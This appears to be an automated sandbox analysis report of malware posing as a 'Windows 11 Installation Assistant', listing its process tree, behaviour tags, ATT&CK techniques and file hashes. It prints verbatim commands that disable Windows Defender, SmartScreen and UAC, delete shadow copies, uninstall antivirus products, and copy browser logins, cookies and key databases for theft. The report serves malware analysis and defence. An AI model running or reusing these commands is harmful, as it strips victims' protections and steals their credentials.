C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe"C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe" /TI/ /SW:0 rEg.EXE Add "hKlm\SofTWArE\mIcrosOfT\windOwS dEfENdEr\EXClUSiOnS\ExtEnSIOns" /V EXE /t rEg_dwOrd /d 0 /F8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:1644 -
C:\Windows\system32\rEg.EXE"C:\Windows\system32\rEg.EXE" Add "hKlm\SofTWArE\mIcrosOfT\windOwS dEfENdEr\EXClUSiOnS\ExtEnSIOns" /V EXE /t rEg_dwOrd /d 0 /F9⤵
- Windows security bypass
PID:3856
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exerp.EXE /Sw:0 rEG.EXE Add "hklM\SoftwarE\MicroSOfT\windoWS dEfENdEr" /v pUAProTECTiOn /t rEG_dWOrd /d 0 /f6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3780 -
C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe"C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe" /Sw:0 rEG.EXE Add "hklM\SoftwarE\MicroSOfT\windoWS dEfENdEr" /v pUAProTECTiOn /t rEG_dWOrd /d 0 /f7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4848 -
C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe"C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe" /TI/ /Sw:0 rEG.EXE Add "hklM\SoftwarE\MicroSOfT\windoWS dEfENdEr" /v pUAProTECTiOn /t rEG_dWOrd /d 0 /f8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:2248 -
C:\Windows\system32\rEG.EXE"C:\Windows\system32\rEG.EXE" Add "hklM\SoftwarE\MicroSOfT\windoWS dEfENdEr" /v pUAProTECTiOn /t rEG_dWOrd /d 0 /f9⤵PID:4872
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\.cmd""5⤵
- System Location Discovery: System Language Discovery
PID:4388 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c CUrL -S ipINFO.io/Ip6⤵
- System Location Discovery: System Language Discovery
PID:304 -
C:\Windows\SysWOW64\curl.exeCUrL -S ipINFO.io/Ip7⤵
- System Location Discovery: System Language Discovery
PID:60
-
-
-
-
C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.scr"C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.scr"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:1276 -
C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr"C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr"6⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Enumerates system info in registry
PID:1652 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/b2bi5a2x.Admin\logins.json\" \"C:\Users\Admin\AppData\Local\Temp\ob7cfhzse9oqu7xo240651515.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/b2bi5a2x.Admin\key3.db\" \"C:\Users\Admin\AppData\Local\Temp\zx14njk1cjdm240651515.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/b2bi5a2x.Admin\key4.db\" \"C:\Users\Admin\AppData\Local\Temp\4a7e2c0lq5gi240651515.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/b2bi5a2x.Admin\cert9.db\" \"C:\Users\Admin\AppData\Local\Temp\i8isbple5q9z240651515.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/b2bi5a2x.Admin\prefs.js\" \"C:\Users\Admin\AppData\Local\Temp\4tcj2ww5i240651515.tmp\" -Force"7⤵
- Suspicious behavior: EnumeratesProcesses
PID:3852
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/b2bi5a2x.Admin\formhistory.sqlite\" \"C:\Users\Admin\AppData\Local\Temp\m0eesb0kzpngmd240661625.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/b2bi5a2x.Admin\cookies.sqlite\" \"C:\Users\Admin\AppData\Local\Temp\c6lq96fwvpih240661625.tmp\" -Force"7⤵
- Suspicious behavior: EnumeratesProcesses
PID:2444
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/enjqfdim.default-release\logins.json\" \"C:\Users\Admin\AppData\Local\Temp\9dv01842bcf3zfv240683609.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/enjqfdim.default-release\key3.db\" \"C:\Users\Admin\AppData\Local\Temp\q2rescb6240683609.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/enjqfdim.default-release\key4.db\" \"C:\Users\Admin\AppData\Local\Temp\434n2sz6anbo50bs240683609.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/enjqfdim.default-release\cert9.db\" \"C:\Users\Admin\AppData\Local\Temp\qrr2ejo103240683609.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/enjqfdim.default-release\prefs.js\" \"C:\Users\Admin\AppData\Local\Temp\2rjjl1u3y2240683609.tmp\" -Force"7⤵
- Suspicious behavior: EnumeratesProcesses
PID:2944
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/enjqfdim.default-release\formhistory.sqlite\" \"C:\Users\Admin\AppData\Local\Temp\67koeg4x240690375.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/enjqfdim.default-release\cookies.sqlite\" \"C:\Users\Admin\AppData\Local\Temp\y63thibysbnp6i240690375.tmp\" -Force"7⤵
- Suspicious behavior: EnumeratesProcesses
PID:3700
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/b2bi5a2x.Admin\logins.json\" \"C:\Users\Admin\AppData\Local\Temp\5oy242k24e240696171.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/b2bi5a2x.Admin\key3.db\" \"C:\Users\Admin\AppData\Local\Temp\l2a139w1240696171.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/b2bi5a2x.Admin\key4.db\" \"C:\Users\Admin\AppData\Local\Temp\jom9k7j13240696171.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/b2bi5a2x.Admin\cert9.db\" \"C:\Users\Admin\AppData\Local\Temp\2opxstaet240696171.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/b2bi5a2x.Admin\prefs.js\" \"C:\Users\Admin\AppData\Local\Temp\yf6pw5mchnd240696171.tmp\" -Force"7⤵
- Suspicious behavior: EnumeratesProcesses
PID:4660
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/b2bi5a2x.Admin\formhistory.sqlite\" \"C:\Users\Admin\AppData\Local\Temp\rgf72ajgb240705546.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/b2bi5a2x.Admin\cookies.sqlite\" \"C:\Users\Admin\AppData\Local\Temp\a388vq9la0kvz71240705546.tmp\" -Force"7⤵
- Suspicious behavior: EnumeratesProcesses
PID:5060
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/enjqfdim.default-release\logins.json\" \"C:\Users\Admin\AppData\Local\Temp\4vt3u3tjt240714531.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/enjqfdim.default-release\key3.db\" \"C:\Users\Admin\AppData\Local\Temp\tbzqz5bgb6240714531.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/enjqfdim.default-release\key4.db\" \"C:\Users\Admin\AppData\Local\Temp\8cbcluskncja3240714531.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/enjqfdim.default-release\cert9.db\" \"C:\Users\Admin\AppData\Local\Temp\uetb77q1gtv240714531.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/enjqfdim.default-release\prefs.js\" \"C:\Users\Admin\AppData\Local\Temp\arxozshvs240714531.tmp\" -Force"7⤵
- Suspicious behavior: EnumeratesProcesses
PID:3132
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/enjqfdim.default-release\formhistory.sqlite\" \"C:\Users\Admin\AppData\Local\Temp\ibgqcei52nq6amwa240720984.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/enjqfdim.default-release\cookies.sqlite\" \"C:\Users\Admin\AppData\Local\Temp\natpu47qqegcjqaw240720984.tmp\" -Force"7⤵
- Suspicious behavior: EnumeratesProcesses
PID:2236
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Local\Google\Chrome\user Data\Default\Login Data\" \"C:\Users\Admin\AppData\Local\Temp\lz1l7ec52tnr78240727468.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\Google\Chrome\user Data\Default\Web Data\" \"C:\Users\Admin\AppData\Local\Temp\zslvhu8uvd240727468.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\Google\Chrome\user Data\Default\Network\Cookies\" \"C:\Users\Admin\AppData\Local\Temp\vjohb7g5en8240727562.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\Google\Chrome\user Data\Default\..\Local State\" \"C:\Users\Admin\AppData\Local\Temp\m7irgx4mlmnf1240727562.tmp\" -Force"7⤵
- Suspicious behavior: EnumeratesProcesses
PID:944
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Local\Microsoft\edge\user Data\Default\Login Data\" \"C:\Users\Admin\AppData\Local\Temp\vhzjq0p3twn240741062.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\Microsoft\edge\user Data\Default\Web Data\" \"C:\Users\Admin\AppData\Local\Temp\l6mrxkjyktx240741062.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\Microsoft\edge\user Data\Default\Cookies\" \"C:\Users\Admin\AppData\Local\Temp\4kqxrdxny0240741156.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\Microsoft\edge\user Data\Default\..\Local State\" \"C:\Users\Admin\AppData\Local\Temp\0dsbrq84ff6u240741156.tmp\" -Force"7⤵
- Suspicious behavior: EnumeratesProcesses
PID:2456
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\Desktop\BlockHide.M2TS\" \"C:\Users\Admin\AppData\Local\Temp\w6cae20njgw94pi5uw3kr8hk34.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\BlockPop.jpg\" \"C:\Users\Admin\AppData\Local\Temp\jjtzxmz59zyyz2nrn8h0v.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\BlockRedo.crw\" \"C:\Users\Admin\AppData\Local\Temp\f7jnqgmt7wcgwj6dq0o9.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\CompressSave.DVR\" \"C:\Users\Admin\AppData\Local\Temp\d0yas27fwgf324tiv8yu9gjq2cda2.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\CompressStop.gif\" \"C:\Users\Admin\AppData\Local\Temp\u60eqlkv72kuzf2o0z9te0d.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\DisconnectExpand.jpg\" \"C:\Users\Admin\AppData\Local\Temp\5xsnbobwf8hhgj9fyun0f6tzd05.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\ExportUnprotect.pps\" \"C:\Users\Admin\AppData\Local\Temp\kakl6szvzqmrwl1zxl9azojz4.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\NewBackup.ram\" \"C:\Users\Admin\AppData\Local\Temp\9wuohmvd26ur9fiar3u605.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\OptimizeConvert.au\" \"C:\Users\Admin\AppData\Local\Temp\l08pizqa7zhc9gnefvbec3tkq1.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\PopAssert.clr\" \"C:\Users\Admin\AppData\Local\Temp\154zpnv0d74nnk9ehz5lk5x.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\RegisterResize.docx\" \"C:\Users\Admin\AppData\Local\Temp\chisdkm4kxsbov24b02f.tmp\" -Force"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4160
-
-
-
-
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\tmp\.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1652 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\tmp\.cmd" "2⤵
- Drops file in Drivers directory
- Suspicious use of WriteProcessMemory
PID:2360 -
C:\Windows\system32\reg.exerEg Add "hKLm\sOftWare\microsOfT\windOws\CurrentVersiOn\polICIEs\sysTem" /v "COnsenTPrompTbEhAvIoradmin" /T rEG_dWOrd /d "0" /F3⤵
- UAC bypass
PID:4028
-
-
C:\Windows\system32\reg.exereg add "hKlm\sOfTwArE\miCrosoFt\WindoWs\currEntVersIon\PoLiCIes\sysTem" /v "COnsEnTPromptbehavIOrUser" /t reG_dWord /d "0" /f3⤵
- UAC bypass
PID:4108
-
-
C:\Windows\system32\reg.exerEg add "hKLm\soFtwArE\micrOsofT\WIndOWs\cUrrenTVersiOn\pOliCIes\system" /V "PromPTOnsECUredesKtoP" /t reG_dWOrd /d "0" /f3⤵
- UAC bypass
PID:3460
-
-
C:\Windows\system32\reg.exereg add "hkLm\soFtwArE\PoliCIes\micrOsoFt\WIndows dEFender\spYneT" /v "sUBmITsAmPlEsConsEnt" /t reg_dWord /d "2" /f3⤵PID:1116
-
-
C:\Windows\system32\reg.exereG Add "hKlm\softwAre\POlicIes\micrOsOfT\Windows dEfEnder\spyneT" /V "sPynetrePOrTIng" /t rEg_dwOrd /d "0" /f3⤵PID:4400
-
-
C:\Windows\system32\reg.exereG Add "hKlm\sOftwArE\pOlIcies\micrOsOFT\WIndOws dEFEndEr" /v "pUAproteCTiOn" /T rEG_dWord /d "0" /F3⤵PID:3968
-
-
C:\Windows\system32\reg.exerEg add "hklm\sOfTware\PolIcIEs\micrOsofT\wIndOws dEfendEr\mPenGinE" /v "mpenABlEpUs" /T reg_dWord /d "0" /F3⤵PID:3360
-
-
C:\Windows\system32\reg.exerEG Add "hkLm\sofTwAre\pOLiCIEs\miCrosoFT\WindoWs\sYstEm" /v "EnABLesmArTsCrEen" /t reG_dword /d "0" /F3⤵PID:944
-
-
C:\Windows\system32\reg.exereG Add "hKlm\sOFTWare\mIcrosoFT\windoWs\cUrrEntVErsiOn\eXPLOrer" /V "smArtscreenEnAblEd" /T reG_sz /d "off" /f3⤵PID:4352
-
-
C:\Windows\system32\reg.exerEG Add "hklm\sOftware\PoLiciEs\microsoFT\mrt" /V "donTofFerthrOuGhWUAU" /T "reG_dwOrd" /d "1" /f3⤵PID:1500
-
-
C:\Windows\system32\reg.exerEG Add "hklm\sOFTWare\polIcies\mICrOsoFt\mrt" /V "dontrEportInfECTIOnInFormAtion" /T "rEg_dWord" /d "1" /f3⤵PID:1196
-
-
C:\Windows\system32\reg.exereG add "hKlm\sOFtWAre\poLICies\mIcrosoft\WindoWs defendEr\uX configuration" /V "notIficatIon_suPPrEss" /t reG_dwOrd /d "1" /f3⤵PID:3804
-
-
C:\Windows\system32\reg.exerEG add "hklm\sOfTWArE\PoliCiEs\miCrosoFT\wIndoWs deFEndEr\WIndows deFender eXplOIT GUArd\ConTrolLed fOLdEr acCess" /v "enablEContrOlledfOLdEracCess" /t reg_dWord /d "0" /F3⤵PID:3800
-
-
C:\Windows\system32\reg.exereG add "hkLm\soFTWare\PoLicies\microsOFT\wIndOws dEfEndEr\rEpOrTInG" /v "dIsAblEEnhAncednOtIFicaTiOns" /T rEG_dword /d "1" /f3⤵PID:4188
-
-
C:\Windows\system32\reg.exereG add "hklm\sOFTwAre\micrOsOfT\WIndoWs defender sECuritY centEr\notIFICATions" /V "dIsablEEnhAncEdnOtiFiCatiOns" /t rEg_dWord /d "1" /F3⤵
- Modifies Windows Defender notification settings
PID:4696
-
-
C:\Windows\system32\reg.exereg add "hKLm\softWarE\mIcrosOFt\wIndows dEfender securitY centEr\vIrUs and ThreAT ProtECtIOn" /v "FIlesBLocKednOTIfiCAtiOndIsablEd" /t rEG_dwOrd /d "1" /F3⤵PID:4380
-
-
C:\Windows\system32\reg.exerEG Add "hkLm\sofTware\miCrOsOFt\WIndoWs defEnder seCUriTY centEr\VIrus and threAT proTectiOn" /V "nOaCTIOnnOTIFiCAtIOndIsaBLed" /T rEG_dWord /d "1" /F3⤵PID:3828
-
-
C:\Windows\system32\reg.exereG add "hkLm\softwAre\mIcrosOFT\WindOWs dEfEnder sECUriTy center\virUs And ThrEAt PrOteCTIon" /v "summarynOtIfIcaTIOndIsABled" /t rEG_dwOrd /d "1" /F3⤵PID:1620
-
-
C:\Windows\system32\reg.exereg add "hklm\sOftwAre\PolICiEs\miCrOsofT\wIndows\exPlorEr" /V "dIsABLEnOtIFICaTIoncenTer" /T rEG_dWord /d "1" /F3⤵PID:4540
-
-
C:\Windows\system32\reg.exerEG add "hkCu\sOFtWarE\micrOsOFT\wIndOWs\currenTVersIOn\PUshnOTIfICatIOns" /v "ToastEnablEd" /t rEg_dWord /d "0" /f3⤵PID:4588
-
-
C:\Windows\system32\reg.exereg Add "hKLm\soFtwarE\pOlicIes\micrOsOfT\wIndOWs dEfEnder sEcuritY CEnter\VIrUs And ThrEAT prOTECTion" /v UIlOCKdOWn /T rEG_dWOrd /d 1 /f3⤵PID:2492
-
-
C:\Windows\system32\reg.exerEg add "hKlm\softWArE\POlICiEs\miCrOsofT\wIndOWs dEfEndEr seCUrItY cenTEr\ApP and Browser prOtEction" /V uIloCkdoWn /T rEg_dword /d 1 /f3⤵PID:1928
-
-
C:\Windows\system32\reg.exereG add "hklm\sOFtWarE\POliCiEs\microsofT\wIndows nT\sysTEmrestorE" /V "disAblECOnfIG" /T reG_dword /d "1" /F3⤵PID:3280
-
-
C:\Windows\system32\reg.exerEG add "hKLm\soFtWAre\POLIcIes\mICrOsOFT\wIndows nT\sYsTemresTore" /v "disabLEsr" /T rEg_dword /d "1" /F3⤵PID:1820
-
-
C:\Windows\system32\reg.exerEG add "hKcU\sOFTWare\mIcrosOFT\WIndoWs\CUrrenTvErsIon\poLiCiEs\aTTaChmenTs" /V "sAvezOnEInformATiOn" /T rEg_dwOrd /d "1" /F3⤵PID:648
-
-
C:\Windows\system32\reg.exereG add "hKLm\sOfTWarE\mICrosOft\windOWs\CurrEnTvErsIon\POLiCIes\AtTachments" /V "sAvEzoneinfOrmATiOn" /T reg_dword /d "1" /f3⤵PID:1380
-
-
C:\Windows\system32\reg.exerEg Add "hKlm\soFTWArE\micrOsoFt\windOws\cUrrenTversiOn\POliciEs\AttachmEnTs" /v "scAnwithantivIrus" /t rEG_dwOrd /d "1" /f3⤵PID:4872
-
-
C:\Windows\system32\icacls.exeicaCLs "C:\Users\Admin\AppData\Roaming\micROSOFT\WiNdOws\StaRt mENu\PrOgRAMs\STaRTuP" /remOve:d "EvErYOnE" /t /C3⤵
- Modifies file permissions
PID:1664
-
-
C:\Windows\system32\icacls.exeiCaCLs "C:\Users\Admin\AppData\Roaming\micROSOFT\WiNdOws\StaRt mENu\PrOgRAMs\STaRTuP" /denY "eVEryOnE":(dE,dC) /t /c3⤵
- Modifies file permissions
PID:3424
-
-
C:\Windows\system32\vssadmin.exevssadmin dELETe shadOws /aLl /QuIEt3⤵
- Interacts with shadow copies
PID:3848
-
-
C:\Windows\system32\attrib.exeaTTrIb +S +H C:\TMP3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:2748
-
-
C:\Windows\system32\find.exefind /c /i "checkappexec.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵PID:2104
-
-
C:\Windows\system32\find.exefind /c /i "smartscreen-prod.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵PID:1000
-
-
C:\Windows\system32\find.exefind /c /i "nav.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵PID:3672
-
-
C:\Windows\system32\find.exefind /c /i "nf.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵PID:844
-
-
C:\Windows\system32\find.exefind /c /i "safebrowsing.googleapis.com" "C:\Windows\system32\drivers\etc\hosts"3⤵PID:2124
-
-
C:\Windows\system32\find.exefind /c /i "ars.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵PID:4252
-
-
C:\Windows\system32\find.exefind /c /i "apprep.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵PID:2216
-
-
C:\Windows\system32\find.exefind /c /i "c.urs.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵PID:4600
-
-
C:\Windows\system32\find.exefind /c /i "feedback.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵PID:1128
-
-
C:\Windows\system32\find.exefind /c /i "ping.nav.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:3132
-
-
C:\Windows\system32\find.exefind /c /i "ping.nf.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:3128
-
-
C:\Windows\system32\find.exefind /c /i "t.nav.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵PID:1528
-
-
C:\Windows\system32\find.exefind /c /i "t.nf.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵PID:2036
-
-
C:\Windows\system32\find.exefind /c /i "t.urs.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵PID:4020
-
-
C:\Windows\system32\find.exefind /c /i "unitedstates.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵PID:2600
-
-
C:\Windows\system32\find.exefind /c /i "unitedstates.smartscreen-prod.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵PID:880
-
-
C:\Windows\system32\find.exefind /c /i "urs.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵PID:4860
-
-
C:\Windows\system32\find.exefind /c /i "urs.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵PID:1220
-
-
C:\Windows\system32\find.exefind /c /i "slscr.update.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵PID:2444
-
-
C:\Windows\System32\Wbem\WMIC.exewmic product where name="ESET Security" call uninstall /nointeractive3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1676
-
-
C:\Windows\System32\Wbem\WMIC.exewmic product where name="Emsisoft Anti-Malware" call uninstall /nointeractive3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3568
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "emsisoft anti-malware" /f3⤵PID:3152
-
-
C:\Windows\system32\cmd.execmd /c "C:\Program Files\Malwarebytes\Anti-Malware\mbuns.exe" /uninstall /verysilent /f3⤵PID:3460
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1376
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4420
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Create or Modify System Process
1Windows Service
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Direct Volume Access
1File and Directory Permissions Modification
1Hide Artifacts
2Hidden Files and Directories
2Impair Defenses
3Disable or Modify Tools
3Indicator Removal
2File Deletion
2Modify Registry
3Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5713ad359b75fe6d947468ec1825202b9
SHA119dcd19f18a2ad6deb581451aad724bd44a592a4
SHA25656572269ec031c63d966c6d3b4712600b908d38826c59c0f9a8225d0a783e9f4
SHA5124df344dec422bed85b186909dc7f9c35126b3bb45e100f18fb95b4a9943ace242479adf5f0194b054d38b67032498f897a5a54b49026efee0c4797cb5a5e54e8
-
Filesize
1KB
MD58e1fdd1b66d2fee9f6a052524d4ddca5
SHA10a9d0994559d1be2eecd8b0d6960540ca627bdb6
SHA2564cc7c1b79d1b48582d4dc27ca8c31457b9bf2441deb7914399bb9e6863f18b13
SHA5125a5494b878b08e8515811ab7a3d68780dac7423f5562477d98249a8bedf7ec98567b7cd5d4c6967d6bc63f2d6d9b7da9a65e0eb29d4b955026b469b5b598d1f3
-
Filesize
1KB
MD5ae009279adf7e456d14ca8fe219f939b
SHA16718948629feb45cf924c9533bbe532987563b09
SHA2564bf7e7715a2bc9070a04dab852d53ab0adde2f46df3520ba31cab3b18e565ef0
SHA5122388e90e0f9e592b9ae3d400cce073225e6d5316d12df53d9ca9d32b45ae396937874672aff61f3d13c04cbecf7314eab256e1fad6e7b8cd5c29704c475a302e
-
Filesize
1KB
MD53f227fa0b699f9a30db777271d1d24f1
SHA13264aba29af8868dd0638dd5bd0791d9234012dc
SHA256b5fca526f30753b464b1fc9fcf0d0b85feaa066abdfaab39f9b6bc2d6d58a3e6
SHA51244ded679e98d87babf6c45d3e416b0de4c1e154ffbc65fd66f5ef1611a1f67885d59328d16465f1e7593e378b08f4e19ee726cffcc583e9e0cd9c38fc0b0a2d1
-
Filesize
1KB
MD5a2890ccc4a5f62dfbb712701c0b15566
SHA142cfdbd467e7f6665da0e38055cd02bef973d5c0
SHA256ce8f9b5b853bd88e4560a475ab1800940b62a91e5fb21dc7955ff6002579e006
SHA51231ec98a857e23366c57624bab975d229e9edecec4a423472238655c03c42e9e834e7651e9cba99dd9186eac9c230e144d378c1817b0ca5670bd8a1bd92124eaa
-
Filesize
1KB
MD5e85d9d47c769b86cd63263419377ed3b
SHA150603fc5ba76d063dd51bb6e0925c7ef1ac4856e
SHA256e0abe9dfc1fe7715dc7af44328101cdde53eea6fa2d7ddea86b207aa08e13ccf
SHA512842f602768ee97c2cd8e9ecfcdacc8a39b628a6c3955356b49aaa3e3876c56614ab218e83ddf5febef6df050ace56a43d20e659abf7db0740abac52701713b3f
-
Filesize
1KB
MD5c0001970190d40af53b35d4f3fda448a
SHA1c57ae00b05a0cb5a31c608512aa95bdef41812d6
SHA256d47e56764438739c42bc2e66459361689c90058410e38aa4663ee844f80ebe7d
SHA51285ba632c69d423ad17bd92496ecdb4abc27a7ba33f37dd396e8bc98efe2e5fce6a666795a1511c542636ca12fae53f045dc78a4744aeca70e9e6f061dc6dbcfb
-
Filesize
1KB
MD5b6d0c0f9b29ea68650ace0a22bf21f77
SHA18946a2a457da62f931af376747949a6edfe50b70
SHA2567e98fe4a9201bd143b75e02480a407e00a386b60f699dbe99ec05edb1ba32ae3
